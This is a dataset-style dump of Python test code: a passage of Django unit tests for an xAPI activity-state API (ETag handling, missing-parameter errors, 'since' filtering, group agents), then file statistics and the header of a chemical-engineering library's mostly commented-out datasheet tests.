self.assertEqual(robj['test'], self.teststate1['test'])
self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
def test_put_etag_conflict_if_match(self):
teststateetagim = {"test":"etag conflict - if match wrong hash","obj":{"agent":"test"}}
new_etag = '"%s"' % hashlib.sha1('wrong etag value').hexdigest()
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
r = self.client.put(path, teststateetagim, content_type=self.content_type, If_Match=new_etag, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 412)
self.assertIn('No resources matched', r.content)
r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], self.teststate1['test'])
self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
def test_put_etag_no_conflict_if_match(self):
teststateetagim = {"test":"etag no conflict - if match good hash","obj":{"agent":"test"}}
new_etag = '"%s"' % hashlib.sha1(json.dumps(self.teststate1)).hexdigest()
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
r = self.client.put(path, teststateetagim, content_type=self.content_type, If_Match=new_etag, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
self.assertEqual(r.content, '')
r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststateetagim['test'])
self.assertEqual(robj['obj']['agent'], teststateetagim['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
def test_put_etag_missing_on_change(self):
teststateetagim = {'test': 'etag no need for etag', 'obj': {'agent': 'test'}}
path = '%s?%s' % (self.url, urllib.urlencode(self.testparams1))
r = self.client.put(path, teststateetagim, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststateetagim['test'])
self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1('%s' % teststateetagim).hexdigest())
def test_put_without_activityid(self):
testparamsbad = {"stateId": "bad_state", "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsbad))
teststatebad = {"test":"put activity state BAD no activity id","obj":{"agent":"test"}}
put1 = self.client.put(path, teststatebad, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
self.assertIn('activityId parameter is missing', put1.content)
def test_put_without_agent(self):
testparamsbad = {"stateId": "bad_state", "activityId": self.activityId}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsbad))
teststatebad = {"test":"put activity state BAD no agent","obj":{"agent":"none"}}
put1 = self.client.put(path, teststatebad, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
self.assertIn('agent parameter is missing', put1.content)
def test_put_without_stateid(self):
testparamsbad = {"activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsbad))
teststatebad = {"test":"put activity state BAD no state id","obj":{"agent":"test"}}
put1 = self.client.put(path, teststatebad, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 400)
self.assertIn('stateId parameter is missing', put1.content)
# Also tests 403 forbidden status
def test_get(self):
username = "other"
email = "other@example.com"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {'username':username,'email': email,'password':password,'password2':password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
r = self.client.get(self.url, self.testparams1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], self.teststate1['test'])
self.assertEqual(robj['obj']['agent'], self.teststate1['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
r2 = self.client.get(self.url, self.testparams2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r2.status_code, 200)
robj2 = ast.literal_eval(r2.content)
self.assertEqual(robj2['test'], self.teststate2['test'])
self.assertEqual(robj2['obj']['agent'], self.teststate2['obj']['agent'])
self.assertEqual(r2['etag'], '"%s"' % hashlib.sha1(r2.content).hexdigest())
r3 = self.client.get(self.url, self.testparams3, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r3.status_code, 200)
robj3 = ast.literal_eval(r3.content)
self.assertEqual(robj3['test'], self.teststate3['test'])
self.assertEqual(robj3['obj']['agent'], self.teststate3['obj']['agent'])
self.assertEqual(r3['etag'], '"%s"' % hashlib.sha1(r3.content).hexdigest())
r4 = self.client.get(self.url, self.testparams4, X_Experience_API_Version="1.0.0", Authorization=auth)
self.assertEqual(r4.status_code, 200)
robj4 = ast.literal_eval(r4.content)
self.assertEqual(robj4['test'], self.teststate4['test'])
self.assertEqual(robj4['obj']['agent'], self.teststate4['obj']['agent'])
self.assertEqual(r4['etag'], '"%s"' % hashlib.sha1(r4.content).hexdigest())
# r5 = self.client.get(self.url, self.testparams3, X_Experience_API_Version="1.0.0", Authorization=auth)
# self.assertEqual(r5.status_code, 403)
def test_get_no_existing_id(self):
testparams = {"stateId": "testID", "activityId": self.activityId, "agent": self.testagent}
r = self.client.get(self.url, testparams, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 404)
def test_get_ids(self):
params = {"activityId": self.activityId, "agent": self.testagent}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
def test_get_with_since(self):
state_id = "old_state_test"
testparamssince = {"stateId": state_id, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
teststatesince = {"test":"get w/ since","obj":{"agent":"test"}}
updated = datetime.datetime(2012, 6, 12, 12, 00).replace(tzinfo=timezone.get_default_timezone())
put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamssince, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatesince['test'])
self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
since = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params2 = {"activityId": self.activityId, "agent": self.testagent, "since": since}
r = self.client.get(self.url, params2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(state_id, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
self.client.delete(self.url, testparamssince, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_get_with_since_tz(self):
state_id = "old_state_test"
testparamssince = {"stateId": state_id, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
teststatesince = {"test":"get w/ since","obj":{"agent":"test"}}
updated = datetime.datetime(2012, 6, 12, 12, 00).replace(tzinfo=timezone.get_default_timezone())
put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamssince, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatesince['test'])
self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
state_id2 = "new_tz_state_test"
testparamssince2 = {"stateId": state_id2, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince2))
teststatesince2 = {"test":"get w/ since TZ","obj":{"agent":"test"}}
updated_tz = "2012-7-1T13:30:00+04:00"
put2 = self.client.put(path, teststatesince2, content_type=self.content_type, updated=updated_tz, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put2.status_code, 204)
self.assertEqual(put2.content, '')
r2 = self.client.get(self.url, testparamssince2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r2.status_code, 200)
robj2 = ast.literal_eval(r2.content)
self.assertEqual(robj2['test'], teststatesince2['test'])
self.assertEqual(robj2['obj']['agent'], teststatesince2['obj']['agent'])
self.assertEqual(r2['etag'], '"%s"' % hashlib.sha1(r2.content).hexdigest())
since = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params2 = {"activityId": self.activityId, "agent": self.testagent, "since": since}
r = self.client.get(self.url, params2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(state_id, r.content)
self.assertNotIn(state_id2, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
self.client.delete(self.url, testparamssince, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, testparamssince2, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_get_with_since_and_regid(self):
# create old state w/ no registration id
state_id = "old_state_test_no_reg"
testparamssince = {"stateId": state_id, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince))
teststatesince = {"test":"get w/ since","obj":{"agent":"test","stateId":state_id}}
updated = datetime.datetime(2012, 6, 12, 12, 00).replace(tzinfo=utc)
put1 = self.client.put(path, teststatesince, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamssince, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatesince['test'])
self.assertEqual(robj['obj']['agent'], teststatesince['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
# create old state w/ registration id
regid = str(uuid.uuid1())
state_id2 = "old_state_test_w_reg"
testparamssince2 = {"registration": regid, "activityId": self.activityId, "agent": self.testagent, "stateId":state_id2}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince2))
teststatesince2 = {"test":"get w/ since and registration","obj":{"agent":"test","stateId":state_id2}}
put2 = self.client.put(path, teststatesince2, content_type=self.content_type, updated=updated.isoformat(), Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put2.status_code, 204)
self.assertEqual(put2.content, '')
r2 = self.client.get(self.url, testparamssince2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r2.status_code, 200)
robj2 = ast.literal_eval(r2.content)
self.assertEqual(robj2['test'], teststatesince2['test'])
self.assertEqual(robj2['obj']['agent'], teststatesince2['obj']['agent'])
self.assertEqual(r2['etag'], '"%s"' % hashlib.sha1(r2.content).hexdigest())
# create new state w/ registration id
state_id3 = "old_state_test_w_new_reg"
testparamssince3 = {"registration": regid, "activityId": self.activityId, "agent": self.testagent, "stateId":state_id3}
path = '%s?%s' % (self.url, urllib.urlencode(testparamssince3))
teststatesince3 = {"test":"get w/ since and registration","obj":{"agent":"test","stateId":state_id3}}
put3 = self.client.put(path, teststatesince3, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put3.status_code, 204)
self.assertEqual(put3.content, '')
r3 = self.client.get(self.url, testparamssince3, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r3.status_code, 200)
robj3 = ast.literal_eval(r3.content)
self.assertEqual(robj3['test'], teststatesince3['test'])
self.assertEqual(robj3['obj']['agent'], teststatesince3['obj']['agent'])
self.assertEqual(r3['etag'], '"%s"' % hashlib.sha1(r3.content).hexdigest())
# get no reg ids set w/o old state
since1 = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params = {"activityId": self.activityId, "agent": self.testagent, "since": since1}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(self.stateId, r.content)
self.assertIn(self.stateId2, r.content)
self.assertNotIn(state_id, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
# get reg id set w/o old state
since2 = datetime.datetime(2012, 7, 1, 12, 00).replace(tzinfo=utc)
params2 = {"registration": regid, "activityId": self.activityId, "agent": self.testagent, "since": since2}
r = self.client.get(self.url, params2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
self.assertIn(state_id3, r.content)
self.assertNotIn(state_id2, r.content)
self.assertNotIn(self.stateId, r.content)
self.assertNotIn(self.stateId2, r.content)
self.assertNotIn(self.stateId3, r.content)
self.assertNotIn(self.stateId4, r.content)
self.client.delete(self.url, testparamssince, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, testparamssince2, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.client.delete(self.url, testparamssince3, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_get_without_activityid(self):
params = {"stateId": self.stateId, "agent": self.testagent}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 400)
self.assertIn('activityId parameter is missing', r.content)
def test_get_without_agent(self):
params = {"stateId": self.stateId, "activityId": self.activityId}
r = self.client.get(self.url, params, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 400)
self.assertIn('agent parameter is missing', r.content)
def test_delete_without_activityid(self):
testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
teststateregid = {"test":"delete activity state w/o activityid","obj":{"agent":"test"}}
put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsregid, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststateregid['test'])
self.assertEqual(robj['obj']['agent'], teststateregid['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
f_r = self.client.delete(self.url, {"registration": self.registration, "stateId": self.stateId, "agent": self.testagent}, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(f_r.status_code, 400)
self.assertIn('activityId parameter is missing', f_r.content)
del_r = self.client.delete(self.url, testparamsregid, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(del_r.status_code, 204)
def test_delete_without_agent(self):
testparamsregid = {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsregid))
teststateregid = {"test":"delete activity state w/o agent","obj":{"agent":"test"}}
put1 = self.client.put(path, teststateregid, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsregid, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststateregid['test'])
self.assertEqual(robj['obj']['agent'], teststateregid['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
f_r = self.client.delete(self.url, {"registration": self.registration, "stateId": self.stateId, "activityId": self.activityId}, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(f_r.status_code, 400)
self.assertIn('agent parameter is missing', f_r.content)
del_r = self.client.delete(self.url, testparamsregid, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(del_r.status_code, 204)
def test_delete_set(self):
testparamsdelset1 = {"registration": self.registration, "stateId": "del_state_set_1", "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsdelset1))
teststatedelset1 = {"test":"delete set #1","obj":{"agent":"test"}}
put1 = self.client.put(path, teststatedelset1, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsdelset1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj = ast.literal_eval(r.content)
self.assertEqual(robj['test'], teststatedelset1['test'])
self.assertEqual(robj['obj']['agent'], teststatedelset1['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
testparamsdelset2 = {"registration": self.registration, "stateId": "del_state_set_2", "activityId": self.activityId, "agent": self.testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparamsdelset2))
teststatedelset2 = {"test":"delete set #2","obj":{"agent":"test"}}
put1 = self.client.put(path, teststatedelset2, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, testparamsdelset2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 200)
robj2 = ast.literal_eval(r.content)
self.assertEqual(robj2['test'], teststatedelset2['test'])
self.assertEqual(robj2['obj']['agent'], teststatedelset2['obj']['agent'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1(r.content).hexdigest())
f_r = self.client.delete(self.url, {"registration": self.registration, "agent": self.testagent, "activityId": self.activityId}, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(f_r.status_code, 204)
r = self.client.get(self.url, testparamsdelset1, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 404)
self.assertIn('no activity', r.content)
r = self.client.get(self.url, testparamsdelset2, X_Experience_API_Version="1.0.0", Authorization=self.auth)
self.assertEqual(r.status_code, 404)
self.assertIn('no activity', r.content)
def test_ie_cors_put_delete(self):
username = "another test"
email = "anothertest@example.com"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {'username':username,'email': email,'password':password,'password2':password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
testagent = '{"name":"another test","mbox":"mailto:anothertest@example.com"}'
sid = "test_ie_cors_put_delete_set_1"
path = '%s?%s' % (self.url, urllib.urlencode({"method":"PUT"}))
content = {"test":"test_ie_cors_put_delete","obj":{"actor":"another test"}}
param = "stateId=%s&activityId=%s&agent=%s&content=%s&Content-Type=application/x-www-form-urlencoded&Authorization=%s&X-Experience-API-Version=1.0.0" % (sid, self.activityId, testagent, content, auth)
put1 = self.client.post(path, param, content_type='application/x-www-form-urlencoded')
self.assertEqual(put1.status_code, 204)
self.assertEqual(put1.content, '')
r = self.client.get(self.url, {"stateId": sid, "activityId": self.activityId, "agent": testagent}, X_Experience_API_Version="1.0.0", Authorization=auth)
self.assertEqual(r.status_code, 200)
import ast
c = ast.literal_eval(r.content)
self.assertEqual(c['test'], content['test'])
self.assertEqual(r['etag'], '"%s"' % hashlib.sha1('%s' % content).hexdigest())
dparam = "agent=%s&activityId=%s&Authorization=%s&Content-Type=application/x-www-form-urlencoded&X-Experience-API-Version=1.0.0" % (testagent,self.activityId,auth)
path = '%s?%s' % (self.url, urllib.urlencode({"method":"DELETE"}))
f_r = self.client.post(path, dparam, content_type='application/x-www-form-urlencoded')
self.assertEqual(f_r.status_code, 204)
def test_agent_is_group(self):
username = "the group"
email = "the.group@example.com"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {'username':username,'email': email,'password':password,'password2':password}
self.client.post(reverse(views.register),form, X_Experience_API_Version="1.0.0")
ot = "Group"
name = "the group"
mbox = "mailto:the.group@example.com"
members = [{"name":"agent1","mbox":"mailto:agent1@example.com"},
{"name":"agent2","mbox":"mailto:agent2@example.com"}]
testagent = json.dumps({"objectType":ot, "name":name, "mbox":mbox,"member":members})
testparams1 = {"stateId": "group.state.id", "activityId": self.activityId, "agent": testagent}
path = '%s?%s' % (self.url, urllib.urlencode(testparams1))
teststate1 = {"test":"put activity state using group as agent","obj":{"agent":"group of 2 agents"}}
put1 = self.client.put(path, teststate1, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put1.status_code, 204)
get1 = self.client.get(self.url, {"stateId":"group.state.id", "activityId": self.activityId, "agent":testagent}, X_Experience_API_Version="1.0.0", Authorization=auth)
self.assertEqual(get1.status_code, 200)
robj = ast.literal_eval(get1.content)
self.assertEqual(robj['test'], teststate1['test'])
self.assertEqual(robj['obj']['agent'], teststate1['obj']['agent'])
self.assertEqual(get1['etag'], '"%s"' % hashlib.sha1(get1.content).hexdigest())
delr = self.client.delete(self.url, testparams1, Authorization=auth, X_Experience_API_Version="1.0.0")
self.assertEqual(delr.status_code, 204)
def test_post_new_state(self):
param = {"stateId": "test:postnewstate", "activityId": "act:test/post.new.state", "agent": '{"mbox":"mailto:testagent@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = {"post":"testing new state", "obj":{"f1":"v1","f2":"v2"}}
r = self.client.post(path, json.dumps(state), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 200)
self.assertEqual(ast.literal_eval(r.content), state)
self.client.delete(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_post_blank_state(self):
param = {"stateId": "test:postnewblankstate", "activityId": "act:test/post.new.blank.state", "agent": '{"mbox":"mailto:testagent@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = ""
r = self.client.post(path, state, content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 400)
self.assertEqual(r.content, 'No body in request')
def test_post_update_state(self):
param = {"stateId": "test:postupdatestate", "activityId": "act:test/post.update.state", "agent": '{"mbox":"mailto:test@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = {"field1":"value1", "obj":{"ofield1":"oval1","ofield2":"oval2"}}
r = self.client.post(path, json.dumps(state), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 200)
self.assertEqual(ast.literal_eval(r.content), state)
state2 = {"field_xtra":"xtra val", "obj":"ha, not a obj"}
r = self.client.post(path, json.dumps(state2), content_type=self.content_type, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 200)
retstate = ast.literal_eval(r.content)
self.assertEqual(retstate['field1'], state['field1'])
self.assertEqual(retstate['field_xtra'], state2['field_xtra'])
self.assertEqual(retstate['obj'], state2['obj'])
self.client.delete(path, Authorization=self.auth, X_Experience_API_Version="1.0.0")
def test_nonjson_put_state(self):
param = {"stateId": "thisisnotjson", "activityId": "act:test/non.json.accepted", "agent": '{"mbox":"mailto:test@example.com"}'}
path = '%s?%s' % (self.url, urllib.urlencode(param))
state = "this is not json"
r = self.client.put(path, state, content_type="text/plain", Authorization=self.auth, X_Experience_API_Version="1.0.1")
self.assertEqual(r.status_code, 204)
r = self.client.get(path, Authorization=self.auth, X_Experience_API_Version="1.0.1")
self.assertEqual(r.status_code, 200)
self.assertEqual(r['Content-Type'], "text/plain")
self.assertEqual(r.content, state)
| 57.777778 | 208 | 0.670051 | 4,961 | 39,000 | 5.137271 | 0.05765 | 0.096524 | 0.051087 | 0.07663 | 0.817429 | 0.783371 | 0.759986 | 0.731696 | 0.714706 | 0.70062 | 0 | 0.029044 | 0.171026 | 39,000 | 674 | 209 | 57.863501 | 0.759264 | 0.010692 | 0 | 0.518095 | 0 | 0.00381 | 0.143368 | 0.025407 | 0 | 0 | 0 | 0 | 0.379048 | 0 | null | null | 0.022857 | 0.028571 | null | null | 0.001905 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7eb4ae6ce7492ba3e32d7997fc94dd5de4209a8 | 8,705 | py | Python | tests/test_datasheet.py | brunokiyoshi/thermo | 5b31d21fd087dd0fc3302f023c5f3c52d9cbee3b | [
"MIT"
] | null | null | null | tests/test_datasheet.py | brunokiyoshi/thermo | 5b31d21fd087dd0fc3302f023c5f3c52d9cbee3b | [
"MIT"
] | null | null | null | tests/test_datasheet.py | brunokiyoshi/thermo | 5b31d21fd087dd0fc3302f023c5f3c52d9cbee3b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
import pytest
import pandas as pd
from thermo.datasheet import *
from thermo.chemical import Chemical
# These tests slow down implementation of new methods too much.
#@pytest.mark.meta_Chemical
#def test_tabulate_solid():
# df = tabulate_solid('sodium hydroxide', pts=2)
# df_as_dict = {'Constant-pressure heat capacity, J/kg/K': {496.14999999999998: 1267.9653086278533, 596.14999999999998: 1582.2714391628249}, 'Density, kg/m^3': {496.14999999999998: 2130.0058046853483, 596.14999999999998: 2130.0058046853483}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
#
#@pytest.mark.meta_Chemical
#def test_tabulate_gas():
# df = tabulate_gas('hexane', pts=2)
# df_as_dict = {'Constant-pressure heat capacity, J/kg/K': {178.07499999999999: 1206.4098393032568, 507.60000000000002: 2551.4044899160472}, 'Viscosity, Pa*S': {178.07499999999999: 3.6993265691382959e-06, 507.60000000000002: 1.0598974706090609e-05}, 'Isentropic exponent': {178.07499999999999: 1.0869273799268073, 507.60000000000002: 1.0393018803424154}, 'Joule-Thompson expansion coefficient, K/Pa': {178.07499999999999: 0.00016800664986363302, 507.60000000000002: 7.8217064543503734e-06}, 'Isobaric expansion, 1/K': {178.07499999999999: 0.015141550023997695, 507.60000000000002: 0.0020523335027846585}, 'Prandtl number': {178.07499999999999: 0.69678226644585661, 507.60000000000002: 0.74170212695888871}, 'Density, kg/m^3': {178.07499999999999: 8.3693048957953522, 507.60000000000002: 2.0927931856300876}, 'Constant-volume heat capacity, J/kg/K': {178.07499999999999: 1109.9268098154776, 507.60000000000002: 2454.9214604282679}, 'Thermal diffusivity, m^2/s': {178.07499999999999: 6.3436058798806709e-07, 507.60000000000002: 6.8282280730497638e-06}, 'Thermal consuctivity, W/m/K': {178.07499999999999: 0.0064050194540236464, 507.60000000000002: 0.036459746670141478}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
#
#@pytest.mark.meta_Chemical
#def test_tabulate_liq():
# df = tabulate_liq('hexane', Tmin=280, Tmax=350, pts=2)
